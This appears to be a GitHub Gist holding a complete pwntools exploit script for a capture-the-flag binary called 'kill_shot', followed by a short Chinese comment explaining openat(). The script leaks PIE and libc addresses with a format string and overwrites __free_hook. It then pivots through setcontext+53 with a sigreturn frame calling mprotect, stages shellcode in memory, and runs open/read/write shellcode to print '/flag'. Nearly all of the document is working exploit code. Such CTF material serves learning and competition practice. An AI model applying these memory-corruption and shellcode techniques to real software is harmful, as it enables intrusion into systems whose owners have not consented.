Created
March 25, 2021 12:41
-
-
Save Mech0n/af04489b014b642b289cdac19433589d to your computer and use it in GitHub Desktop.
setcontext + 53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
context.terminal = ['tmux', 'splitw', '-h'] | |
context(arch = 'amd64' , os = 'linux', log_level='debug') | |
p = process('./kill_shot') | |
# gdb.attach(p, 'b *$rebase(0x1098)\n') | |
def add(size, payload): | |
p.sendlineafter('3- exit', str(1)) | |
p.sendlineafter("Size:", str(size)) | |
p.sendlineafter("Data:", payload) | |
def delete(idx): | |
p.sendlineafter('3- exit', str(2)) | |
p.sendlineafter("Index:", str(idx)) | |
if __name__ == "__main__": | |
# 23 25 0x1240 | |
p.sendlineafter("Format:", "AAAA%24$p.%25$p.") | |
p.recvuntil("AAAA") | |
pie = int(p.recvuntil(".")[:-1], 16) - 0x1240 | |
libc = int(p.recvuntil(".")[:-1], 16) - 0x021b97 | |
success("LIBC: " + str(hex(libc))) | |
success("PIE : " + str(hex(pie))) | |
setcontext = libc + 0x0000000000052070 | |
__free_hook = libc + 0x00000000003ed8e8 | |
mprotect = libc + 0x000000000011bae0 | |
kill = pie + 0x10B4 | |
p.sendlineafter("Pointer:", str(__free_hook)) | |
p.sendafter("Content:", p64(kill)) | |
# gdb.attach(p, "b *%s\n" % hex((setcontext + 53))) | |
frame = SigreturnFrame() | |
frame.rsp = __free_hook + 0x10 | |
frame.rdi = __free_hook & 0xfffffffffffff000 | |
frame.rsi = 0x1000 | |
frame.rdx = 7 | |
frame.rip = mprotect | |
shellcode1 = ''' | |
xor rdi, rdi | |
mov rsi, %d | |
mov rdx, 0x1000 | |
mov rax, 0 | |
syscall | |
jmp rsi | |
''' % (__free_hook & 0xfffffffffffff000) | |
payload = str(frame) | |
add(0x100, payload) # 1 | |
add(0x100, payload) # 2 | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook + 0x8)) | |
p.sendafter("Content:", p64(__free_hook + 0x18)) | |
add(0x100, payload) | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook + 0x10)) | |
p.sendafter("Content:", p64(__free_hook + 0x18)) | |
add(0x100, payload) | |
delete(1) | |
shellcode = asm(shellcode1) + '\x90' # 32 / 8 | |
p.sendlineafter("Pointer:", str(__free_hook + 0x18)) | |
p.sendafter("Content:", shellcode[0:8]) | |
add(0x100, payload) | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook + 0x20)) | |
p.sendafter("Content:", shellcode[8:16]) | |
add(0x100, payload) | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook + 0x28)) | |
p.sendafter("Content:", shellcode[16:24]) | |
add(0x100, payload) | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook + 0x30)) | |
p.sendafter("Content:", shellcode[24:32]) | |
add(0x100, payload) | |
delete(1) | |
p.sendlineafter("Pointer:", str(__free_hook)) | |
p.sendafter("Content:", p64(setcontext + 53)) | |
add(0x100, payload) | |
delete(1) | |
shellcode2 = ''' | |
xor rdi, rdi | |
push rdi | |
mov rdi, 0x67616c662f | |
push rdi | |
mov rsi, rsp | |
xor rdi, rdi | |
xor rdx, rdx | |
mov rax, 257 | |
syscall | |
mov rdi, rax | |
mov rsi, rsp | |
mov rdx, 0x50 | |
mov rax, 0 | |
syscall | |
mov rdi, 1 | |
mov rsi, rsp | |
mov rdx, rax | |
mov rax, 1 | |
syscall | |
mov rdi, 0 | |
mov rax, 60 | |
syscall | |
''' | |
payload = asm(shellcode2) | |
p.sendline(payload) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
openat()
:1、函数原型:
int openat(int fd,const char *path,int oflag,.../* mode_t mode */);
2、头文件:
#include <fcntl.h>
3、参数说明:
(1)
fd
:相对于
open
函数,此函数多了一个fd
参数,异同点如下:a、若
path
指定的是绝对路径,fd
参数被忽略,openat
函数相当于open
函数;b、若
path
指定的是相对路径,fd
参数指出了相对路径名在文件系统中的开始地址,fd
参数是通过打开相对路径名所在的目录来获取;c、
path
指定了相对路径名,fd
参数具有特殊值AT_FDCWD
.在此情况下,路径名在当前工作目录中获取,openat
函数在操作上与open
类似。(2)其余参数与
open
一致,在此不重复。